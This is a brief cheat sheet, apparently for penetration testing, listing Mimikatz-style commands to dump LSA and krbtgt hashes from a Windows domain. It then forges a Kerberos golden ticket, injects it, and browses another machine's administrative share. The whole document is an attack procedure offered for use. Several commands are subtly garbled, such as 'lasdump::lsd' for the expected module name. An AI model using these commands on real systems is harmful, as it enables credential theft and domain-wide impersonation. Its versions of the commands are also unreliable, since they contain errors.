Table of Contents

• Dump LSA Hashes
• Dump krbtgt Hash
• Golden Ticket

Dump LSA Hashes

lasdump::lsd /patch

Dump krbtgt Hash

lasdump::lsd /inject /name:krbtgt

Golden Ticket

kerberos::golden /User:<username> /domain:<domain> /sid:<user-sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt

# if successful
misc::cmd

# list other user's file
dir \\<computer-name>\<driver>$